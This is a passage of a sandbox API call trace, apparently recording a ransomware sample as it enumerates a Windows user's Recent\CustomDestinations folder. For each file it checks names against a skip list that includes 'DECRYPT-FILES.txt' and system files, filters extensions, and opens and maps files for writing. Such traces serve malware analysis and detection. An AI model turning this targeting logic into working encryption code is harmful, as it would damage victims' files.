ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefa2da80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa2da80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.221] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa2da80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefa2da80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa2da80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.221] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.222] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.222] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.222] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.222] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.222] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.222] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.222] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.222] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0a16c9.tmp" [0182.222] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.222] CloseHandle (hObject=0x0) returned 0 [0182.222] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.222] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabf1ff00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms.uni8DR", cAlternateFileName="1B4DD6~1.UNI")) returned 1 [0182.222] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="DECRYPT-FILES.txt") returned -1 [0182.222] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="autorun.inf") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="boot.ini") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="desktop.ini") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="ntuser.dat") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="iconcache.db") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="bootsect.bak") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="ntuser.dat.log") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="thumbs.db") returned -1 [0182.223] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.uni8DR", lpString2="Bootfont.bin") returned -1 [0182.223] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms.uni8DR") returned 45 [0182.223] lstrcmpiW (lpString1="uni8DR", lpString2="lnk") returned 1 [0182.223] lstrcmpiW (lpString1="uni8DR", lpString2="exe") returned 1 [0182.223] lstrcmpiW (lpString1="uni8DR", lpString2="sys") returned 1 [0182.223] lstrcmpiW (lpString1="uni8DR", lpString2="dll") returned 1 [0182.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.223] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms.uni8DR") returned 45 [0182.223] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="1b4dd67f29cb1962.customDestinations-ms.uni8DR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.uni8DR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.uni8DR" [0182.223] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.uni8DR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.uni8dr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.224] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=288) returned 1 [0182.224] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.224] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.224] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.224] CloseHandle (hObject=0x288) returned 1 [0182.224] CloseHandle (hObject=0x284) returned 1 [0182.224] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.224] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22bfd60, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0xcbe116e0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xabf46060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2070, dwReserved0=0x0, dwReserved1=0x0, cFileName="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", cAlternateFileName="590AEE~1.L1N")) returned 1 [0182.224] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="DECRYPT-FILES.txt") returned -1 [0182.224] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="autorun.inf") returned -1 [0182.224] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="boot.ini") returned -1 [0182.224] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="desktop.ini") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="ntuser.dat") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="iconcache.db") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="bootsect.bak") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="ntuser.dat.log") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="thumbs.db") returned -1 [0182.225] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms.l1Nd7a", lpString2="Bootfont.bin") returned -1 [0182.225] lstrlenW (lpString="590aee7bdd69b59b.customDestinations-ms.l1Nd7a") returned 45 [0182.225] lstrcmpiW (lpString1="l1Nd7a", lpString2="lnk") returned -1 [0182.225] lstrcmpiW (lpString1="l1Nd7a", lpString2="exe") returned 1 [0182.225] lstrcmpiW (lpString1="l1Nd7a", lpString2="sys") returned -1 [0182.225] lstrcmpiW (lpString1="l1Nd7a", lpString2="dll") returned 1 [0182.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.225] lstrlenW (lpString="590aee7bdd69b59b.customDestinations-ms.l1Nd7a") returned 45 [0182.225] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="590aee7bdd69b59b.customDestinations-ms.l1Nd7a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.l1Nd7a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.l1Nd7a" [0182.225] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.l1Nd7a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.l1nd7a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.227] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=8304) returned 1 [0182.227] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.227] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.228] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.228] CloseHandle (hObject=0x288) returned 1 [0182.228] CloseHandle (hObject=0x284) returned 1 [0182.228] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.228] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2da822a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabf92320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms.MauxC1C", cAlternateFileName="5AFE4D~1.MAU")) returned 1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="DECRYPT-FILES.txt") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="autorun.inf") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="boot.ini") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="desktop.ini") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="ntuser.dat") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="iconcache.db") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="bootsect.bak") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="ntuser.dat.log") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="thumbs.db") returned -1 [0182.228] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.MauxC1C", lpString2="Bootfont.bin") returned -1 [0182.228] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms.MauxC1C") returned 46 [0182.228] lstrcmpiW (lpString1="MauxC1C", lpString2="lnk") returned 1 [0182.228] lstrcmpiW (lpString1="MauxC1C", lpString2="exe") returned 1 [0182.228] lstrcmpiW (lpString1="MauxC1C", lpString2="sys") returned -1 [0182.228] lstrcmpiW (lpString1="MauxC1C", lpString2="dll") returned 1 [0182.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.228] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms.MauxC1C") returned 46 [0182.228] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5afe4de1b92fc382.customDestinations-ms.MauxC1C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.MauxC1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.MauxC1C" [0182.229] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.MauxC1C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.mauxc1c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.229] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=17579) returned 1 [0182.229] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.229] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.230] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.230] CloseHandle (hObject=0x288) returned 1 [0182.230] CloseHandle (hObject=0x284) returned 1 [0182.230] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.230] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xac02a8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="5d696d521de238c3.customDestinations-ms.5lJAv", cAlternateFileName="5D696D~1.5LJ")) returned 1 [0182.230] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="DECRYPT-FILES.txt") returned -1 [0182.230] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="autorun.inf") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="boot.ini") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="desktop.ini") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="ntuser.dat") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="iconcache.db") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="bootsect.bak") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="ntuser.dat.log") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="thumbs.db") returned -1 [0182.231] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms.5lJAv", lpString2="Bootfont.bin") returned -1 [0182.231] lstrlenW (lpString="5d696d521de238c3.customDestinations-ms.5lJAv") returned 44 [0182.231] lstrcmpiW (lpString1="5lJAv", lpString2="lnk") returned -1 [0182.231] lstrcmpiW (lpString1="5lJAv", lpString2="exe") returned -1 [0182.231] lstrcmpiW (lpString1="5lJAv", lpString2="sys") returned -1 [0182.231] lstrcmpiW (lpString1="5lJAv", lpString2="dll") returned -1 [0182.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.231] lstrlenW (lpString="5d696d521de238c3.customDestinations-ms.5lJAv") returned 44 [0182.231] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5d696d521de238c3.customDestinations-ms.5lJAv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.5lJAv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.5lJAv" [0182.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.5lJAv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.5ljav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.232] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=6364) returned 1 [0182.232] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.232] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.233] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.233] CloseHandle (hObject=0x288) returned 1 [0182.233] CloseHandle (hObject=0x284) returned 1 [0182.233] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.233] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac050a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms.uCbMJb", cAlternateFileName="7E4DCA~1.UCB")) returned 1 [0182.233] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="DECRYPT-FILES.txt") returned -1 [0182.233] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="autorun.inf") returned -1 [0182.233] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="boot.ini") returned -1 [0182.233] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="desktop.ini") returned -1 [0182.233] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="ntuser.dat") returned -1 [0182.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="iconcache.db") returned -1 [0182.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="bootsect.bak") returned -1 [0182.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="ntuser.dat.log") returned -1 [0182.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="thumbs.db") returned -1 [0182.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.uCbMJb", lpString2="Bootfont.bin") returned -1 [0182.234] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms.uCbMJb") returned 45 [0182.234] lstrcmpiW (lpString1="uCbMJb", lpString2="lnk") returned 1 [0182.234] lstrcmpiW (lpString1="uCbMJb", lpString2="exe") returned 1 [0182.234] lstrcmpiW (lpString1="uCbMJb", lpString2="sys") returned 1 [0182.234] lstrcmpiW (lpString1="uCbMJb", lpString2="dll") returned 1 [0182.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.234] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms.uCbMJb") returned 45 [0182.234] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="7e4dca80246863e3.customDestinations-ms.uCbMJb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb" [0182.234] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 